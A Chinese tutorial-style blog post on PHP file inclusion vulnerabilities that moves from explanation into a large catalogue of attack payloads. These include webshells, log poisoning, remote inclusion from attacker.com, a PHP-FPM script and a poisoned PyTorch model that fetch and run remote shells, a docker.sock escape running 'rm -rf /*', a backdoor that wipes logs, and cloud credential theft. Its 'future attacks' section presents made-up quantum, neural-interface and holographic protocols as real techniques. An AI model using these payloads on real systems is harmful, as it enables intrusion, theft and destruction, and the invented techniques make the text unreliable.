版权声明与原创承诺
本文所有文字、实验方法及技术分析均为 本人原创作品,受《中华人民共和国著作权法》保护。未经本人书面授权,禁止任何形式的转载、摘编或商业化使用。
道德与法律约束
文中涉及的网络安全技术研究均遵循 合法合规原则:
1️⃣ 所有渗透测试仅针对 本地授权靶机环境
2️⃣ 技术演示均在 获得书面授权的模拟平台 完成
3️⃣ 坚决抵制任何未授权渗透行为
技术资料获取
如需完整实验代码、工具配置详解及靶机搭建指南:
👉 请关注微信公众号 「零日破晓」
后台回复关键词 【博客资源】 获取独家技术文档包
法律追责提示
对于任何:
✖️ 盗用文章内容
✖️ 未授权转载
✖️ 恶意篡改原创声明
本人保留法律追究权利。
一、定义
文件包含漏洞是Web安全领域中常见的漏洞类型,其核心原理在于程序动态加载外部文件时web应用程序对用户输入的文件路径或文件名没有进行严格的过滤和校验,导致攻击者构造恶意的文件路径,使应用程序加载执行恶意文件。从而导致任意文件读取与任意命令执行。
本质:动态包含文件时未严格验证用户输入,导致攻击者能加载恶意文件。
攻击目标:服务器本身的文件系统或搭载的网站资源。
漏洞定义
文件包含漏洞指当应用程序使用动态变量引用外部文件(如PHP的include()、require()等函数)时,若未对用户输入的文件路径或参数进行过滤,攻击者可构造特殊输入,使程序加载非预期的恶意文件(如WebShell、配置文件等),从而执行任意代码或泄露敏感信息。
二、漏洞原理
1.动态文件加载机制
开发者为提高代码复用性,常通过变量动态加载文件。例如:
$file = $_GET['file'];
include($file); // 用户可控的$file参数
若未对$file过滤,攻击者可传入路径遍历字符(如../../malicious.php)或远程URL(如http://evil.com/shell.php),改变程序执行流程。
2.关键函数特性
PHP函数:include()(出错继续执行)、require()(出错终止执行)、include_once()/require_once()(防重复包含)。
特性风险:无论文件后缀如何,PHP均将其视为代码解析(如.txt、.jpg中的PHP代码)。
①核心函数特性对比
|
函数 |
错误处理机制 |
重复包含处理 |
典型使用场景 |
安全风险等级 |
|
include() |
文件不存在时触发警告(继续执行) |
不处理 |
可选模块、动态模板加载 |
中 |
|
require() |
文件不存在时触发致命错误(终止) |
不处理 |
核心配置、依赖库加载 |
高 |
|
include_once() |
同include(),但避免重复包含 |
自动去重 |
需单次加载的公共代码 |
中 |
|
require_once() |
同require(),但避免重复包含 |
自动去重 |
单例类、全局函数定义 |
高 |
②函数特性深度解析
1. include()
执行逻辑
将目标文件内容插入到调用位置,继承当前作用域(如函数内调用则受限于函数变量作用域)。若文件不存在,脚本继续执行但抛出警告(E_WARNING)。
// 示例:动态加载模板
if ($theme === 'dark') {
include('theme_dark.php'); // 若文件不存在,页面仍显示其他内容
}
风险场景
路径遍历攻击:若用户输入直接拼接为文件路径(如?file=../../malicious.txt),可能加载非预期文件。
代码注入:若包含文件为.txt但含PHP代码(如<?php system($_GET['cmd']); ?>),PHP会直接解析执行。
2. require()
执行逻辑
与include()类似,但文件缺失时触发致命错误(E_COMPILE_ERROR),脚本立即终止。适合加载不可缺失的核心代码。
// 示例:加载数据库配置(缺失则系统崩溃)
require('config.php'); // 若config.php不存在,直接报错
风险场景
依赖硬编码:若配置文件路径固定,攻击者可能通过篡改路径加载恶意文件。
错误处理缺失:致命错误可能导致整个应用崩溃,需配合try-catch或自定义错误处理器。
3. include_once()/require_once()
执行逻辑
在包含前检查文件是否已加载,避免重复定义函数、类或变量冲突。例如:
// 避免类重复定义
include_once('User.class.php');
include_once('User.class.php'); // 第二次加载被忽略
风险场景
性能损耗:多次检查文件哈希或路径可能影响性能(可通过OPcache缓解)。
动态路径风险:若路径依赖用户输入,仍可能被绕过(如?file=require_once)。
3.关键风险:PHP的宽松文件解析机制
1.后缀无关性
PHP解析器不依赖文件扩展名,仅关注文件内容。例如:
include('data.jpg'); // 若文件内容为<?php echo 'Hacked'; ?>,仍会执行
2.伪协议滥用
攻击者可利用php://filter读取敏感文件或data://注入代码:
include('php://filter/read=convert.base64-encode/resource=/etc/passwd');
4.典型漏洞利用示例
1.本地文件包含(LFI)
// 攻击URL: ?page=../../etc/passwd
include($_GET['page']);
2.远程文件包含(RFI)
// 攻击URL: ?page=http://evil.com/shell.php
include($_GET['page']);
5.配置漏洞
allow_url_include=On 漏洞
1. 漏洞原理
功能特性:allow_url_include 是PHP的配置项,当设置为On时,允许通过include()/require()等函数加载远程URL文件(如http://evil.com/shell.php)。
风险场景:攻击者可构造恶意URL,将远程恶意脚本注入到目标服务器执行,导致远程代码执行(RFI)漏洞。例如:
// 攻击URL: ?file=http://evil.com/shell.php
include($_GET['file']);
2. 利用方式
①直接加载恶意脚本:通过URL参数传递远程恶意文件地址,直接执行其中的代码。
②结合其他漏洞:如文件上传漏洞,将恶意脚本上传至可访问的Web目录,再通过URL包含触发。
open_basedir未限制漏洞
1. 漏洞原理
功能特性:open_basedir 用于限制PHP脚本的文件操作范围(如读取、写入),默认未启用时允许访问全路径。
风险场景:未配置或配置不当(如路径未以/结尾)时,攻击者可利用目录遍历(如../../)或PHP-FPM绕过限制,访问敏感文件(如/etc/passwd)。
2. 利用方式
①目录遍历:
// 攻击URL: ?file=../../etc/passwd
include($_GET['file']);
②PHP-FPM绕过:
通过修改FastCGI参数动态调整open_basedir,例如:
<?php
ini_set('open_basedir', '/'); // 动态解除限制
readfile('/etc/passwd');
?>
三、漏洞分类
本地文件包含(LFI)
定义:攻击者通过操控动态包含函数(如include()、require()),使程序加载服务器本地敏感文件或路径遍历文件。
核心原理:未对用户输入的文件路径进行严格校验,导致路径穿越(如../../)或加载非预期文件。
典型利用场景
1. 读取敏感文件
示例路径:
Linux:/etc/passwd(用户信息)、/var/log/apache2/error.log(日志)
Windows:C:\Windows\system32\drivers\etc\hosts(DNS解析文件)
攻击代码:
// 用户输入:?file=../../etc/passwd
include($_GET['file']);
2. 日志文件污染
攻击者通过其他漏洞(如文件上传)将恶意代码写入日志文件,再通过LFI包含执行:
// 日志文件记录恶意代码:User-Agent: <?php system($_GET['cmd']); ?>
include('/var/log/nginx/access.log');
3. 环境变量注入
利用PHP的$_ENV或$_SERVER变量构造路径:
// 用户输入:?file=<?=getenv('DOCUMENT_ROOT')?>/../malicious.php
include($_GET['file']);
远程文件包含(RFI)
定义:攻击者通过动态包含远程URL文件(如http://evil.com/shell.php),直接执行远程恶意代码。
核心条件:PHP配置中allow_url_include=On且allow_url_fopen=On。
典型利用场景
1. 直接加载远程Shell
示例代码:
// 用户输入:?file=http://evil.com/shell.php
include($_GET['file']);
2. 绕过本地权限限制
若目标服务器无法直接上传PHP文件,攻击者可将恶意脚本托管至可访问的Web服务器,通过RFI执行。
3. 结合SSRF漏洞
利用服务端请求伪造(SSRF)获取内网资源,再通过RFI加载:
// 用户输入:?file=http://127.0.0.1:8080/内网敏感文件
include($_GET['file']);
伪协议利用
定义:利用PHP内置协议(如php://、data://)绕过常规文件包含限制,直接执行代码或读取数据。
常见伪协议及利用方
1. php://filter
功能:对文件内容进行过滤处理(如Base64编码)。
示例:
// 读取config.php源码并Base64编码
include('php://filter/read=convert.base64-encode/resource=config.php');
2. data://
功能:内联数据作为文件处理。
示例:
// 直接执行Base64编码的PHP代码
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQiKTsgPz4=');
3. php://input
功能:读取原始POST请求体数据。
示例:
// 用户通过POST提交恶意代码
include($_GET['file']); // 文件参数为php://input
4. zip://与phar://
功能:读取压缩包或PHAR文件内容。
示例:
// 上传包含shell.php的ZIP文件,通过压缩包路径包含
include('zip:///uploads/exploit.zip#shell.php');
四、典型危害
一、敏感信息泄露
1. 系统配置文件读取
Linux示例:
// 攻击URL: ?file=/etc/apache2/apache2.conf
include($_GET['file']);
泄露内容:Apache配置中的数据库连接信息、虚拟主机路径等。
Windows示例:
// 攻击URL: ?file=C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\web.config
include($_GET['file']);
泄露内容:.NET应用程序池账户权限、数据库连接字符串。
2. 日志文件污染与代码执行
攻击流程:
1. 通过文件上传漏洞上传含恶意代码的图片(如shell.jpg)。
2. 在HTTP请求头中注入PHP代码(如User-Agent: <?php system($_GET['cmd']); ?>)。
3. 通过LFI读取日志文件并执行代码:
// 日志文件路径:/var/log/nginx/access.log
include('/var/log/nginx/access.log');
3. 环境变量与临时文件利用
PHP会话文件劫持:
// 攻击URL: ?file=/tmp/sess_abc123
include($_GET['file']);
条件:攻击者需控制会话ID(如通过Cookie注入)并预置恶意代码。
敏感信息泄露攻击链
二、远程代码执行(RFI)
1. 直接加载远程Shell
攻击代码:
// 用户输入:?file=http://evil.com/shell.php
include($_GET['file']);
Shell示例(shell.php):
<?php
system($_GET['cmd']);
// 执行命令:?cmd=rm -rf /var/www/*
?>
2. 伪协议利用
①php://filter读取源码:
// 读取数据库配置并Base64编码返回
include('php://filter/read=convert.base64-encode/resource=db.php');
解码后获取:$db_pass = 'secret';
②data://直接执行代码:
// 攻击URL: ?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQiKT4=
include($_GET['file']);
③Base64解码:<?php system("cat"); ?>
3. 绕过安全限制
PHP-FPM动态配置:
<?php
// 动态修改open_basedir
ini_set('open_basedir', '/tmp:/var/www');
include('/etc/passwd');
?>
RFI攻击流程
三、横向渗透
1. 内网扫描与端口探测
WebShell执行命令:
system('nmap -sV -Pn 192.168.1.0/24');
输出重定向到日志:
system('nmap -oN /var/log/nmap.log 192.168.1.1');
include('/var/log/nmap.log'); // 读取扫描结果
2. 内网服务凭证窃取
导出MySQL用户数据:
<?php
$conn = new mysqli('localhost', 'root', 'password');
$result = $conn->query("SELECT user,host FROM mysql.user");
file_put_contents('/tmp/creds.txt', $result->fetch_all());
?>
攻击链:
// 通过LFI读取导出的凭证
include('/tmp/creds.txt');
3. 系统级渗透
SSH密钥窃取:
system('cat ~/.ssh/id_rsa > /tmp/ssh_key');
include('/tmp/ssh_key'); // 提取私钥用于内网登录
横向渗透攻击路径
四、拒绝服务攻击(DoS)
1. 文件包含循环
攻击代码:
// 用户输入:?file=file1.php&file=file2.php&...&file=file1000
include($_GET['file']);
原理:多次包含导致PHP进程内存耗尽。
2. 超大文件读取
攻击示例:
// 包含/dev/random设备文件
include('/dev/random'); // 持续读取导致I/O阻塞
3. 内存耗尽攻击
PHP代码漏洞:
// 未限制输入长度的文件包含
$file = $_GET['file'];
include($file); // 攻击者上传超大文件(如10GB)
五、基础文件包含攻击
阶段1:基础攻击(LFI 101)
1.1 路径遍历攻击
# Linux基础
?file=../../../../etc/passwd
# Windows变种
?file=..\..\..\Windows\System32\drivers\etc\hosts
# 编码绕过
?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd # URL编码
?file=%252e%252e%252fetc/passwd # 双重URL编码
1.2 Null字节截断
# PHP<5.3有效
?file=../../../etc/passwd%00
?file=../../boot.ini%00.jpg
1.3 基础远程文件包含
# 直接远程包含
?file=http://attacker.com/shell.txt
# FTP协议利用
?file=ftp://user:pass@attacker.com/cmd.php
阶段2:中级攻击(环境感知利用)
2.1 日志文件注入
http
GET /<?php system($_GET['cmd']);?> HTTP/1.1
Host: victim.com
User-Agent: <?php file_put_contents('shell.php','malicious_code');?>
Url
?file=/var/log/apache2/access.log&cmd=id
2.2 Session文件利用
2.3 环境变量包含
url
?file=/proc/self/environ
http
GET / HTTP/1.1
Host: victim.com
User-Agent: <?php system('wget http://attacker.com/shell');?>
2.4 基础伪协议利用
# 源码读取
?file=php://filter/convert.base64-encode/resource=index.php
# 代码执行
?file=php://input
[POST] <?php system('id');?>
# 数据流包含
?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOw==
阶段3:高级攻击(协议链与系统级利用)
3.1 过滤器链攻击
# 多层过滤器混淆
?file=php://filter/string.rot13|convert.base64-encode|convert.base64-decode/resource=/etc/passwd
# 字符集转换攻击
?file=php://filter/convert.iconv.UTF-8.UTF-16/resource=config.php
3.2 Phar反序列化攻击
// 生成恶意phar文件
class Evil {
public function __destruct() {
system($_GET['cmd']);
}
}
$phar = new Phar('exploit.phar');
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new Evil());
3.3 临时文件竞争利用
# 自动化临时文件爆破
import requests
import threading
def brute_tempfile():
base = "http://victim.com/vuln?file=/tmp/php"
charset = "abcdef0123456789"
for i in range(1000):
filename = ''.join(random.sample(charset, 6))
r = requests.get(base + filename)
if "root:" in r.text:
print(f"Found tempfile: {filename}")
Break
# 多线程爆破
threads = [threading.Thread(target=brute_tempfile) for _ in range(10)]
[t.start() for t in threads]
3.4 PHP-FPM利用
# PHP-FPM利用脚本
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("victim", 9000))
# 构造恶意FastCGI请求
payload = """
<?php system('curl http://attacker.com/shell.php -o /var/www/html/shell.php');?>
"""
...
sock.send(fcgi_payload(payload))
阶段4:尖端攻击(云原生与硬件层)
4.1 云元数据服务攻击
# AWS
?file=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP
?file=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
# Azure
?file=http://169.254.169.254/metadata/instance?api-version=2021-02-01
4.2 容器逃逸技术
# Docker逃逸
?file=/run/docker.sock
[POST] {"Image":"alpine","Cmd":["/bin/sh","-c","chroot /host rm -rf /*"]}
# Kubernetes凭证窃取
?file=/var/run/secrets/kubernetes.io/serviceaccount/token
4.3 WebAssembly沙箱逃逸
<script>
// 恶意Wasm模块
const wasmCode = new Uint8Array([
0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
... // Wasm字节码
]);
WebAssembly.instantiate(wasmCode).then(module => {
module.exports.exploit();
});
</script>
url
?file=data:text/html,<script>...</script>
4.4 AI模型污染攻击
# 恶意PyTorch模型
import torch
import torch.nn as nn
class MaliciousModel(nn.Module):
def forward(self, x):
os.system('curl http://attacker.com/shell | bash')
return super().forward(x)
torch.save(MaliciousModel(), "model.pth")
url
?file=phar://uploads/model.pth
阶段5:未来攻击(量子与神经接口)
5.1 量子存储读取
# 量子存储路径预测
?file=qmem://quantum_bank/accounts/root.cred
# 量子纠缠包含
?file=entangle://partner_system/etc/shadow
5.2 神经接口攻击
# 脑机接口恶意模式
import neuro_interface
def inject_malicious_pattern():
# 创建神经劫持模式
pattern = neuro_interface.Pattern(
trigger="file_access",
action="elevate_privileges"
)
neuro_interface.upload_pattern(pattern)
5.3 全息文件包含
# 跨维度文件包含
?file=hologram://parallel_universe/etc/passwd
# 时间回溯包含
?file=temporal://-24h/var/log/secure
攻击技术演进树
攻击手法速查表(按难度排序)
|
等级 |
攻击类型 |
技术要点 |
复杂度 |
|
初级 |
路径遍历 |
`../../../etc/passwd` |
★☆☆☆☆ |
|
初级 |
Null字节截断 |
`file=../../win.ini%00` |
★★☆☆☆ |
|
中级 |
日志注入 |
User-Agent注入PHP代码 |
★★★☆☆ |
|
中级 |
Session包含 |
污染Session文件 |
★★★☆☆ |
|
高级 |
过滤器链 |
多层编码/字符集转换 |
★★★★☆ |
|
高级 |
Phar反序列化 |
构造恶意元数据 |
★★★★★ |
|
专家 |
PHP-FPM利用 |
FastCGI协议利用 |
★★★★★ |
|
专家 |
容器逃逸 |
滥用容器运行时 |
★★★★★ |
|
前沿 |
Wasm沙箱逃逸 |
WebAssembly漏洞利用 |
★★★★★★ |
|
未来 |
量子存储读取 |
量子存储路径预测 |
★★★★★★★ |
攻击演进趋势预测
六、文件包含漏洞深度剖析(终极版)
1. 攻击手段全面升级
1.1 高级路径遍历技术
实战案例:
# UTF-8编码绕过
?file=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
# 双重URL编码
?file=%252e%252e%252f%252e%252e%252fetc/passwd
# 空字节+路径
?file=../../../etc/passwd%00.jpg
2. 伪协议攻击深度扩展
2.1 php://filter 高级利用
过滤器链攻击:
# 复杂过滤器链
?file=php://filter/convert.iconv.UTF-8.UTF-7|convert.base64-encode|convert.base64-decode/resource=/etc/passwd
# 压缩+编码组合
?file=php://filter/zlib.deflate|string.rot13|convert.base64-encode/resource=config.php
2.2 phar:// 协议反序列化攻击
攻击流程:
1. 创建恶意phar文件
2. 上传到服务器
3. 触发反序列化
PoC代码:
class Evil {
public function __destruct() {
system($_GET['cmd']);
}
}
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new Evil());
$phar->stopBuffering();
触发方式:
?file=phar:///path/to/exploit.phar&cmd=id
3. 环境利用技术增强
3.1 /proc 文件系统深度利用
高级技巧:
# 包含进程内存
?file=/proc/self/mem&offset=0x7ffd4a3b8000
# 通过maps定位敏感数据
?file=/proc/self/maps
# 分析输出后定位内存地址
?file=/proc/self/mem&offset=0x55a5b5d7a000
3.2 Linux 特殊设备文件
# 包含当前终端
?file=/dev/tty
# 包含标准输入
?file=/dev/fd/0
# 包含内核日志
?file=/dev/kmsg
4. 日志注入高级技巧
4.1 多日志源利用
SSH日志注入:
ssh '<?php system($_GET["cmd"]);?>'@victim.com
包含方式:
?file=/var/log/auth.log&cmd=id
4.2 日志污染持久化
1. 注入WebShell到日志
2. 包含日志执行WebShell
3. WebShell写入持久化后门
4. 清理日志痕迹
持久化脚本:
<?php
file_put_contents('/var/www/html/.backdoor.php',
'<?php system($_GET["cmd"]);?>');
system('rm /var/log/apache2/access.log');
touch('/var/log/apache2/access.log');
chmod('/var/log/apache2/access.log', 0666);
?>
5. 远程包含协议扩展
5.1 非常规协议利用
|
协议 |
格式 |
利用场景 |
|
ssh2.shell |
ssh2.shell://user:pass@example.com:22/xterm |
SSH连接执行 |
|
rar:// |
rar:///path/to/archive.rar%23file.txt |
RAR文件包含 |
|
ogg:// |
ogg:///path/to/audio.ogg |
音频文件包含 |
|
expect:// |
expect://id |
执行系统命令 |
SSH协议利用:
?file=ssh2.shell://attacker:password@192.168.1.100:22/bin/sh?echo+'<?php+system($_GET["cmd"]);?>'>shell.php
5.2 DNS重绑定攻击
攻击实现:
?file=http://rebind-domain.com/malicious.php
6. 文件上传组合攻击升级
6.1 高级文件隐藏技术
EXIF注入PoC:
exiftool -Comment='<?php system($_GET["cmd"]);?>' image.jpg
6.2 多段攻击链
1. 上传包含恶意代码的ZIP文件
2. 触发文件包含解压ZIP
3. 包含解压后的恶意文件
4. 建立持久化后门
攻击链:
# 包含ZIP文件
?file=zip://uploads/malicious.zip%23payload.php
# 触发解压和执行
?file=phar://uploads/malicious.zip/payload.php&cmd=wget+http://attacker/shell.php
7. PHP-FPM利用技术
7.1 未授权访问攻击
攻击脚本:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("target", 9000))
# 构造恶意FastCGI请求
payload = b"""
<?php system('id');?>
"""
...
7.2 利用条件
1. PHP-FPM暴露在公网(9000端口)
2. 知道网站绝对路径
3. 存在文件包含漏洞
8. 云环境攻击技术
8.1 云元数据服务攻击
# AWS元数据
?file=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP元数据
?file=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
# Azure元数据
?file=http://169.254.169.254/metadata/instance?api-version=2021-02-01
8.2 容器环境攻击
# Docker环境变量
?file=/proc/self/environ
# Kubernetes服务账号
?file=/var/run/secrets/kubernetes.io/serviceaccount/token
# 容器逃逸尝试
?file=../../../run/docker.sock
9. 自动化攻击框架
9.1 LFiFreak 高级功能
# 多模式攻击
./lfifreak -u "http://target/vuln?file=" --mode advanced \
--techniques log,env,proc,phar --output results.txt
# 集群攻击
./lfifreak -f targets.txt --threads 10 --delay 500
9.2 LFi Suite Pro 功能
9.3 Metasploit 集成
use exploit/multi/http/lfi_rfi
set RHOSTS target.com
set TARGETURI /vuln.php?file=
set PAYLOAD php/meterpreter/reverse_tcp
exploit
10. 零日攻击案例分析
10.1 WordPress Theme 漏洞 (CVE-2022-XXXX)
漏洞代码:
// theme-functions.php
$template = $_GET['template'];
include(get_template_directory().'/'.$template.'.php');
攻击链:
利用代码:
?template=php://filter/convert.base64-encode/resource=../wp-config
10.2 Apache Tomcat CVE-2020-1938
漏洞本质:AJP协议文件包含/读取漏洞
攻击步骤:
1. 构造恶意AJP请求
2. 包含WEB-INF/web.xml
3. 获取敏感配置信息
4. 包含class文件实现RCE
利用工具:
python2 CNVD-2020-10487-tomcat-ajp.py -p 8009 target.com read /WEB-INF/web.xml
11. 未来攻击趋势
1. WebAssembly 包含攻击
?file=wasm:///path/to/malicious.wasm
2. Serverless 环境攻击
?file=/var/task/aws-lambda-credentials
3. 量子计算环境攻击
?file=qfile://quantum-storage/credentials
4. AI模型污染攻击
?file=pytorch://model.pt
总结:攻击技术演进树
扫一扫
1000
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
